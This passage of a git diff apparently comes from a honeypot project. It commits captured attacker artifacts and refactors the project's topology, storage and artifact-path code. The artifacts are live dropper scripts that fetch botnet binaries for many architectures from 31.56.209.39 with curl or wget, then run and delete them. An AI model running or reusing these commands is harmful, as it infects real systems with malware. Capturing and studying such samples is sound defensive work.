||||||
|
curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
|
||||||
|
curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
|
||||||
|
|
||||||
|
curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
|
||||||
|
curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
|
||||||
|
curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
|
||||||
|
curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
|
||||||
|
curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
|
||||||
|
curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
|
||||||
|
curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
|
||||||
|
curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
|
||||||
|
curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
|
||||||
|
curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
|
||||||
|
curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
|
||||||
3
artifacts/evil.sh
Normal file
3
artifacts/evil.sh
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
wget http://31.56.209.39/wget.sh -o wget.sh
|
||||||
|
|
||||||
|
wget http://31.56.209.39/curl.sh -o curl.sh
|
||||||
3
artifacts/wget.sh
Normal file
3
artifacts/wget.sh
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
[0] Downloading 'http://31.56.209.39/wget.sh' ...
|
||||||
|
Saving 'wget.sh.1'
|
||||||
|
HTTP response 200 OK [http://31.56.209.39/wget.sh]
|
||||||
46
artifacts/wget.sh.1
Normal file
46
artifacts/wget.sh.1
Normal file
@@ -0,0 +1,46 @@
|
|||||||
|
#!/bin/sh
|
||||||
|
ulimit -n 4096
|
||||||
|
ulimit -n 999999
|
||||||
|
ulimit -v 2097152
|
||||||
|
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
|
||||||
|
rm -rf odin*
|
||||||
|
rm -rf bizy*
|
||||||
|
rm -rf rs*
|
||||||
|
rm -rf *.sh
|
||||||
|
|
||||||
|
wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
|
||||||
|
wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
|
||||||
|
wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
|
||||||
|
wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
|
||||||
|
wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
|
||||||
|
wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
|
||||||
|
wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
|
||||||
|
wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
|
||||||
|
wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
|
||||||
|
wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
|
||||||
|
|
||||||
|
wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
|
||||||
|
wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
|
||||||
|
wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
|
||||||
|
wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
|
||||||
|
wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
|
||||||
|
wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
|
||||||
|
wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
|
||||||
|
wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
|
||||||
|
wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
|
||||||
|
wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
|
||||||
|
wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
|
||||||
|
wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
|
||||||
|
wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
|
||||||
|
|
||||||
|
wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
|
||||||
|
wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
|
||||||
|
wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
|
||||||
|
wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
|
||||||
|
wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
|
||||||
|
wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
|
||||||
|
wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
|
||||||
|
wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
|
||||||
|
wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
|
||||||
|
wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
|
||||||
|
wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
|
||||||
0
bait/.gitkeep
Normal file
0
bait/.gitkeep
Normal file
5
bait/README.md
Normal file
5
bait/README.md
Normal file
@@ -0,0 +1,5 @@
|
|||||||
|
# bait/
|
||||||
|
|
||||||
|
Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries concatenate onto the hardcoded bait baseline (additive to realism-engine output, never replacing).
|
||||||
|
|
||||||
|
JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.
|
||||||
BIN
decnet.tar
Normal file
BIN
decnet.tar
Normal file
Binary file not shown.
@@ -194,7 +194,7 @@ async def self_destruct() -> None:
|
|||||||
argv = ["/bin/bash", path]
|
argv = ["/bin/bash", path]
|
||||||
spawn_kwargs = {"start_new_session": True}
|
spawn_kwargs = {"start_new_session": True}
|
||||||
|
|
||||||
subprocess.Popen( # nosec B603
|
subprocess.Popen( # type: ignore[call-overload] # nosec B603
|
||||||
argv,
|
argv,
|
||||||
stdin=subprocess.DEVNULL,
|
stdin=subprocess.DEVNULL,
|
||||||
stdout=subprocess.DEVNULL,
|
stdout=subprocess.DEVNULL,
|
||||||
|
|||||||
@@ -121,7 +121,7 @@ def start() -> Optional[asyncio.Task]:
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
from decnet import __version__ as _v
|
from decnet import __version__ as _v # type: ignore[attr-defined]
|
||||||
agent_version = _v
|
agent_version = _v
|
||||||
except Exception:
|
except Exception:
|
||||||
agent_version = "unknown"
|
agent_version = "unknown"
|
||||||
|
|||||||
@@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
|
|||||||
return str(tid)
|
return str(tid)
|
||||||
|
|
||||||
|
|
||||||
|
def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
|
||||||
|
"""Verify hash integrity and structural validity; return topology_id."""
|
||||||
|
local_hash = canonical_hash(hydrated)
|
||||||
|
if local_hash != version_hash:
|
||||||
|
raise HashMismatch(
|
||||||
|
f"master hash {version_hash!r} does not match agent hash "
|
||||||
|
f"{local_hash!r} — refusing to apply"
|
||||||
|
)
|
||||||
|
issues = _validate_topology(hydrated)
|
||||||
|
if _validation_errors(issues):
|
||||||
|
raise ValidationError(issues)
|
||||||
|
return _topology_id(hydrated)
|
||||||
|
|
||||||
|
|
||||||
|
async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
|
||||||
|
"""Tear down the current topology if it differs from topology_id.
|
||||||
|
|
||||||
|
Master is authoritative — a different pinned topology (fully applied,
|
||||||
|
partially applied, or drifted) is torn down before the new apply proceeds.
|
||||||
|
Refusing with 409 would leave the agent stuck in a state only a human
|
||||||
|
could resolve.
|
||||||
|
"""
|
||||||
|
existing = store.current()
|
||||||
|
if existing is None or existing.topology_id == topology_id:
|
||||||
|
return
|
||||||
|
log.info(
|
||||||
|
"superseding topology %s with %s on master authority",
|
||||||
|
existing.topology_id, topology_id,
|
||||||
|
)
|
||||||
|
try:
|
||||||
|
await teardown(existing.topology_id, store)
|
||||||
|
except Exception as exc: # noqa: BLE001 — we still want to try applying
|
||||||
|
log.warning(
|
||||||
|
"best-effort teardown of superseded topology %s failed: %s",
|
||||||
|
existing.topology_id, exc,
|
||||||
|
)
|
||||||
|
# Hard-clear the store row so the new apply isn't blocked by a
|
||||||
|
# half-torn-down predecessor. Leftover docker objects surface via
|
||||||
|
# the next heartbeat's observed block.
|
||||||
|
store.clear(existing.topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
|
||||||
|
"""Create bridge networks, write compose file, and bring up containers.
|
||||||
|
|
||||||
|
Sync/blocking — callers must dispatch via asyncio.to_thread.
|
||||||
|
|
||||||
|
``--always-recreate-deps`` keeps service containers' netns shares
|
||||||
|
fresh: every decky service joins its base's netns via
|
||||||
|
``network_mode: container:<base>``, and that share is bound at
|
||||||
|
service start time. If a base is recreated (e.g. when ``ports:``
|
||||||
|
changes after toggling ``forwards_l3``) but compose decides the
|
||||||
|
services are unchanged, the services keep a stale netns FD
|
||||||
|
pointing at the destroyed base — they end up in an empty
|
||||||
|
namespace with only ``lo``, and external traffic hits a closed
|
||||||
|
port on the live base. Forcing dependents to recreate alongside
|
||||||
|
the base is the cheapest way to make this race impossible.
|
||||||
|
"""
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
client = docker.from_env()
|
||||||
|
for lan in hydrated["lans"]:
|
||||||
|
net_name = _topology_network_name(topology_id, lan["name"])
|
||||||
|
create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
|
||||||
|
write_topology_compose(hydrated, compose_path)
|
||||||
|
_compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path)
|
||||||
|
|
||||||
|
|
||||||
async def apply(
|
async def apply(
|
||||||
hydrated: dict[str, Any],
|
hydrated: dict[str, Any],
|
||||||
version_hash: str,
|
version_hash: str,
|
||||||
@@ -73,76 +140,11 @@ async def apply(
|
|||||||
Any docker / compose error propagates up; the endpoint maps it
|
Any docker / compose error propagates up; the endpoint maps it
|
||||||
to 500 and records the message on the store row.
|
to 500 and records the message on the store row.
|
||||||
"""
|
"""
|
||||||
local_hash = canonical_hash(hydrated)
|
topology_id = _check_hash_and_validate(hydrated, version_hash)
|
||||||
if local_hash != version_hash:
|
await _teardown_superseded(topology_id, store)
|
||||||
raise HashMismatch(
|
await asyncio.to_thread(_materialise, hydrated, topology_id)
|
||||||
f"master hash {version_hash!r} does not match agent hash "
|
|
||||||
f"{local_hash!r} — refusing to apply"
|
|
||||||
)
|
|
||||||
|
|
||||||
issues = _validate_topology(hydrated)
|
|
||||||
if _validation_errors(issues):
|
|
||||||
raise ValidationError(issues)
|
|
||||||
|
|
||||||
topology_id = _topology_id(hydrated)
|
|
||||||
# Master is authoritative. If a different topology is pinned here
|
|
||||||
# — whether it fully applied, only partially applied (failure
|
|
||||||
# marker row + orphan containers), or drifted — teardown first,
|
|
||||||
# then accept the new one. Refusing with 409 would leave the
|
|
||||||
# agent stuck in a state only a human could resolve.
|
|
||||||
existing = store.current()
|
|
||||||
if existing is not None and existing.topology_id != topology_id:
|
|
||||||
log.info(
|
|
||||||
"superseding topology %s with %s on master authority",
|
|
||||||
existing.topology_id, topology_id,
|
|
||||||
)
|
|
||||||
try:
|
|
||||||
await teardown(existing.topology_id, store)
|
|
||||||
except Exception as exc: # noqa: BLE001 — we still want to try applying
|
|
||||||
log.warning(
|
|
||||||
"best-effort teardown of superseded topology %s failed: %s",
|
|
||||||
existing.topology_id, exc,
|
|
||||||
)
|
|
||||||
# Hard-clear the store row so the new apply isn't blocked
|
|
||||||
# by a half-torn-down predecessor. Leftover docker objects
|
|
||||||
# will surface via the next heartbeat's observed block.
|
|
||||||
store.clear(existing.topology_id)
|
|
||||||
|
|
||||||
lans = hydrated["lans"]
|
|
||||||
compose_path = _topology_compose_path(topology_id)
|
|
||||||
client = docker.from_env()
|
|
||||||
|
|
||||||
# Bridges + compose are sync/blocking; hop to a thread so we don't
|
|
||||||
# stall the event loop on a slow docker daemon.
|
|
||||||
def _materialise() -> None:
|
|
||||||
for lan in lans:
|
|
||||||
net_name = _topology_network_name(topology_id, lan["name"])
|
|
||||||
internal = not lan["is_dmz"]
|
|
||||||
create_bridge_network(
|
|
||||||
client, net_name, lan["subnet"], internal=internal
|
|
||||||
)
|
|
||||||
write_topology_compose(hydrated, compose_path)
|
|
||||||
# ``--always-recreate-deps`` keeps service containers' netns shares
|
|
||||||
# fresh: every decky service joins its base's netns via
|
|
||||||
# ``network_mode: container:<base>``, and that share is bound at
|
|
||||||
# service start time. If a base is recreated (e.g. when ``ports:``
|
|
||||||
# changes after toggling ``forwards_l3``) but compose decides the
|
|
||||||
# services are unchanged, the services keep a stale netns FD
|
|
||||||
# pointing at the destroyed base — they end up in an empty
|
|
||||||
# namespace with only ``lo``, and external traffic hits a closed
|
|
||||||
# port on the live base. Forcing dependents to recreate alongside
|
|
||||||
# the base is the cheapest way to make this race impossible.
|
|
||||||
_compose_with_retry(
|
|
||||||
"up", "--build", "-d", "--always-recreate-deps",
|
|
||||||
compose_file=compose_path,
|
|
||||||
)
|
|
||||||
|
|
||||||
await asyncio.to_thread(_materialise)
|
|
||||||
|
|
||||||
store.put(topology_id, version_hash, hydrated)
|
store.put(topology_id, version_hash, hydrated)
|
||||||
log.info(
|
log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
|
||||||
"topology %s applied on agent (%d LANs)", topology_id, len(lans)
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
async def teardown(
|
async def teardown(
|
||||||
|
|||||||
@@ -63,6 +63,7 @@ class TopologyStore:
|
|||||||
# The agent is single-process, so there's no real contention —
|
# The agent is single-process, so there's no real contention —
|
||||||
# sqlite's own connection lock is enough.
|
# sqlite's own connection lock is enough.
|
||||||
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
|
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
|
||||||
|
self._conn.row_factory = sqlite3.Row
|
||||||
self._conn.execute(
|
self._conn.execute(
|
||||||
"CREATE TABLE IF NOT EXISTS applied_topology ("
|
"CREATE TABLE IF NOT EXISTS applied_topology ("
|
||||||
" topology_id TEXT PRIMARY KEY,"
|
" topology_id TEXT PRIMARY KEY,"
|
||||||
@@ -84,11 +85,11 @@ class TopologyStore:
|
|||||||
if row is None:
|
if row is None:
|
||||||
return None
|
return None
|
||||||
return AppliedRow(
|
return AppliedRow(
|
||||||
topology_id=row[0],
|
topology_id=row["topology_id"],
|
||||||
applied_version_hash=row[1],
|
applied_version_hash=row["applied_version_hash"],
|
||||||
hydrated=json.loads(row[2]),
|
hydrated=json.loads(row["hydrated_blob_json"]),
|
||||||
applied_at=int(row[3]),
|
applied_at=int(row["applied_at"]),
|
||||||
last_error=row[4],
|
last_error=row["last_error"],
|
||||||
)
|
)
|
||||||
|
|
||||||
# ---------------------------------------------------------------- writes
|
# ---------------------------------------------------------------- writes
|
||||||
|
|||||||
1
decnet/artifacts/__init__.py
Normal file
1
decnet/artifacts/__init__.py
Normal file
@@ -0,0 +1 @@
|
|||||||
|
"""Artifact storage helpers shared between the web router and TTP workers."""
|
||||||
86
decnet/artifacts/paths.py
Normal file
86
decnet/artifacts/paths.py
Normal file
@@ -0,0 +1,86 @@
|
|||||||
|
"""
|
||||||
|
Shared on-disk artifact path resolution.
|
||||||
|
|
||||||
|
Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
|
||||||
|
quarantine tree:
|
||||||
|
|
||||||
|
/var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
|
||||||
|
|
||||||
|
Two callers need to translate ``(decky, stored_as, service)`` into a
|
||||||
|
concrete ``Path`` rooted under that tree:
|
||||||
|
|
||||||
|
* The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
|
||||||
|
(``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
|
||||||
|
download for the dashboard.
|
||||||
|
* The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
|
||||||
|
reads the stored ``.eml`` at tag-time so body-aware predicates
|
||||||
|
(R0047 BEC, R0048 macro) don't need raw body text on the bus.
|
||||||
|
|
||||||
|
Both callers share the same validation rules and the same
|
||||||
|
defence-in-depth symlink-escape check; this module is the single
|
||||||
|
implementation. It is auth-agnostic — wrappers layer authentication
|
||||||
|
where appropriate (the router does ``require_admin``, the lifter does
|
||||||
|
not).
|
||||||
|
"""
|
||||||
|
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
# decky names come from the deployer — lowercase alnum plus hyphens.
|
||||||
|
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
|
||||||
|
|
||||||
|
# Services that own an artifacts subdir. Kept explicit so a caller
|
||||||
|
# can't pivot into arbitrary subpaths via a query string or bus payload.
|
||||||
|
_ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
|
||||||
|
|
||||||
|
# stored_as is assembled by the capturing template as:
|
||||||
|
# ${ts}_${sha:0:12}_${base}
|
||||||
|
# where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
|
||||||
|
# and base is the original filename's basename. Keep the filename charset
|
||||||
|
# tight but allow common punctuation dropped files actually use.
|
||||||
|
_STORED_AS_RE = re.compile(
|
||||||
|
r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Module-level so tests can monkeypatch. Override via env in production
|
||||||
|
# (the systemd unit sets this) — the prod path matches the bind mount
|
||||||
|
# declared in decnet/services/{ssh,smtp}.py.
|
||||||
|
ARTIFACTS_ROOT = Path(
|
||||||
|
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
class ArtifactPathError(ValueError):
|
||||||
|
"""Raised when (decky, stored_as, service) fails validation or escapes
|
||||||
|
the artifacts root.
|
||||||
|
|
||||||
|
The router catches this and re-raises HTTPException(400). The lifter
|
||||||
|
catches it and treats the event as having no body available (no-tag).
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
|
||||||
|
"""Validate inputs, resolve the on-disk path, and confirm it stays
|
||||||
|
inside the artifacts root.
|
||||||
|
|
||||||
|
Raises :class:`ArtifactPathError` on any violation. Does NOT check
|
||||||
|
that the file exists — callers handle that distinctly (404 for the
|
||||||
|
router, no-tag for the lifter).
|
||||||
|
"""
|
||||||
|
if service not in _ALLOWED_SERVICES:
|
||||||
|
raise ArtifactPathError("invalid service")
|
||||||
|
if not _DECKY_RE.fullmatch(decky):
|
||||||
|
raise ArtifactPathError("invalid decky name")
|
||||||
|
if not _STORED_AS_RE.fullmatch(stored_as):
|
||||||
|
raise ArtifactPathError("invalid stored_as")
|
||||||
|
|
||||||
|
root = ARTIFACTS_ROOT.resolve()
|
||||||
|
candidate = (root / decky / service / stored_as).resolve()
|
||||||
|
# defence-in-depth: even though the regexes reject `..`, make sure a
|
||||||
|
# symlink or weird filesystem state can't escape the root.
|
||||||
|
if root not in candidate.parents and candidate != root:
|
||||||
|
raise ArtifactPathError("path escapes artifacts root")
|
||||||
|
return candidate
|
||||||
129
decnet/artifacts/shards.py
Normal file
129
decnet/artifacts/shards.py
Normal file
@@ -0,0 +1,129 @@
|
|||||||
|
"""Shared asciinema shard helpers.
|
||||||
|
|
||||||
|
Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
|
||||||
|
so non-router callers (the BEHAVE-SHELL session-ended handler in
|
||||||
|
``decnet/profiler/worker.py``, the collector's session aggregator)
|
||||||
|
can resolve shard paths without crossing the layer boundary into the
|
||||||
|
FastAPI router.
|
||||||
|
|
||||||
|
Functions here speak in :class:`ValueError` — callers that want HTTP
|
||||||
|
semantics translate at the boundary. The router wrappers keep their
|
||||||
|
existing ``HTTPException`` behaviour for backwards compatibility.
|
||||||
|
|
||||||
|
PII boundary unchanged: shards live on disk; this module returns
|
||||||
|
:class:`pathlib.Path` pointers, never byte content. The ``_get_index``
|
||||||
|
cache stores byte offsets only.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
from collections import OrderedDict
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
ARTIFACTS_ROOT = Path(
|
||||||
|
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
|
||||||
|
)
|
||||||
|
|
||||||
|
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
|
||||||
|
_SERVICE_RE = re.compile(r"^(ssh|telnet)$")
|
||||||
|
_SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
|
||||||
|
_SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
|
||||||
|
|
||||||
|
# (path, mtime_ns) → {sid: [(offset, length), ...]}
|
||||||
|
_INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
|
||||||
|
OrderedDict()
|
||||||
|
)
|
||||||
|
_CACHE_MAX = 32
|
||||||
|
|
||||||
|
|
||||||
|
def validate_names(decky: str, service: str) -> None:
|
||||||
|
"""Raise :class:`ValueError` if ``decky`` / ``service`` look forged."""
|
||||||
|
if not _DECKY_RE.fullmatch(decky):
|
||||||
|
raise ValueError(f"invalid decky name: {decky!r}")
|
||||||
|
if not _SERVICE_RE.fullmatch(service):
|
||||||
|
raise ValueError(f"invalid service: {service!r}")
|
||||||
|
|
||||||
|
|
||||||
|
def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
|
||||||
|
"""Resolve ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``
|
||||||
|
with escape-attempt detection. Raises :class:`ValueError` on
|
||||||
|
invalid inputs.
|
||||||
|
"""
|
||||||
|
validate_names(decky, service)
|
||||||
|
if not _SHARD_BASENAME_RE.fullmatch(shard_name):
|
||||||
|
raise ValueError(f"invalid shard name: {shard_name!r}")
|
||||||
|
root = ARTIFACTS_ROOT.resolve()
|
||||||
|
candidate = (root / decky / service / "transcripts" / shard_name).resolve()
|
||||||
|
if root not in candidate.parents and candidate != root:
|
||||||
|
raise ValueError(f"path escapes artifacts root: {candidate}")
|
||||||
|
return candidate
|
||||||
|
|
||||||
|
|
||||||
|
def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
|
||||||
|
index: dict[str, list[tuple[int, int]]] = {}
|
||||||
|
with path.open("rb") as f:
|
||||||
|
offset = 0
|
||||||
|
for line in f:
|
||||||
|
length = len(line)
|
||||||
|
m = _SID_LINE_RE.search(line)
|
||||||
|
if m:
|
||||||
|
sid = m.group(1).decode("ascii")
|
||||||
|
index.setdefault(sid, []).append((offset, length))
|
||||||
|
offset += length
|
||||||
|
return index
|
||||||
|
|
||||||
|
|
||||||
|
def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
|
||||||
|
"""Return ``(sid → [(offset, length), …], file_size)``.
|
||||||
|
|
||||||
|
Cached by ``(path, mtime_ns)``; rebuilt when the shard changes.
|
||||||
|
"""
|
||||||
|
st = path.stat()
|
||||||
|
key = (str(path), st.st_mtime_ns)
|
||||||
|
if key in _INDEX_CACHE:
|
||||||
|
_INDEX_CACHE.move_to_end(key)
|
||||||
|
return _INDEX_CACHE[key], st.st_size
|
||||||
|
index = _build_index(path)
|
||||||
|
_INDEX_CACHE[key] = index
|
||||||
|
_INDEX_CACHE.move_to_end(key)
|
||||||
|
while len(_INDEX_CACHE) > _CACHE_MAX:
|
||||||
|
_INDEX_CACHE.popitem(last=False)
|
||||||
|
return index, st.st_size
|
||||||
|
|
||||||
|
|
||||||
|
def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
|
||||||
|
"""Scan every ``sessions-YYYY-MM-DD.jsonl`` under the decky's
|
||||||
|
transcripts dir until one claims this ``sid``.
|
||||||
|
|
||||||
|
Newest shards first — most lookups are for recent sessions. Caches
|
||||||
|
the per-shard sid index, so repeated calls are ~free until the
|
||||||
|
shard's mtime changes.
|
||||||
|
|
||||||
|
Returns ``None`` when nothing claims the sid OR when the
|
||||||
|
transcripts dir is missing / unreadable. Never raises on
|
||||||
|
filesystem-level errors — callers treat ``None`` as "skip".
|
||||||
|
"""
|
||||||
|
validate_names(decky, service)
|
||||||
|
root = ARTIFACTS_ROOT.resolve()
|
||||||
|
transcripts_dir = (root / decky / service / "transcripts").resolve()
|
||||||
|
if root not in transcripts_dir.parents:
|
||||||
|
return None
|
||||||
|
try:
|
||||||
|
if not transcripts_dir.is_dir():
|
||||||
|
return None
|
||||||
|
entries = list(transcripts_dir.iterdir())
|
||||||
|
except (OSError, PermissionError):
|
||||||
|
return None
|
||||||
|
shards = sorted(
|
||||||
|
(p for p in entries if _SHARD_BASENAME_RE.fullmatch(p.name)),
|
||||||
|
reverse=True,
|
||||||
|
)
|
||||||
|
for shard in shards:
|
||||||
|
try:
|
||||||
|
index, _size = get_index(shard)
|
||||||
|
except (OSError, PermissionError):
|
||||||
|
continue
|
||||||
|
if sid in index:
|
||||||
|
return shard
|
||||||
|
return None
|
||||||
@@ -13,7 +13,7 @@ from typing import Sequence
|
|||||||
from decnet.asn.base import Provider
|
from decnet.asn.base import Provider
|
||||||
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
|
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
|
||||||
from decnet.asn.iptoasn.parse import parse_file
|
from decnet.asn.iptoasn.parse import parse_file
|
||||||
from decnet.asn.lookup import AsnLookup
|
from decnet.asn.lookup import AsnLookup, Range
|
||||||
from decnet.asn.paths import ensure_root
|
from decnet.asn.paths import ensure_root
|
||||||
|
|
||||||
logger = logging.getLogger("decnet.asn.iptoasn.provider")
|
logger = logging.getLogger("decnet.asn.iptoasn.provider")
|
||||||
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
|
|||||||
"asn.iptoasn: cache load failed, rebuilding: %s", exc
|
"asn.iptoasn: cache load failed, rebuilding: %s", exc
|
||||||
)
|
)
|
||||||
|
|
||||||
ranges = []
|
ranges: list[Range] = []
|
||||||
for path in self.data_paths():
|
for path in self.data_paths():
|
||||||
if not path.exists():
|
if not path.exists():
|
||||||
continue
|
continue
|
||||||
|
|||||||
@@ -76,7 +76,7 @@ def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
|
|||||||
up at all we no-op.
|
up at all we no-op.
|
||||||
"""
|
"""
|
||||||
try:
|
try:
|
||||||
from decnet.telemetry import wrap_repository # type: ignore[attr-defined]
|
from decnet.telemetry import wrap_repository
|
||||||
except ImportError:
|
except ImportError:
|
||||||
return bus
|
return bus
|
||||||
try:
|
try:
|
||||||
|
|||||||
@@ -58,7 +58,7 @@ def make_thread_safe_publisher(
|
|||||||
contract the rest of this module already upholds.
|
contract the rest of this module already upholds.
|
||||||
"""
|
"""
|
||||||
if bus is None:
|
if bus is None:
|
||||||
return lambda _topic, _payload, _event_type="": None
|
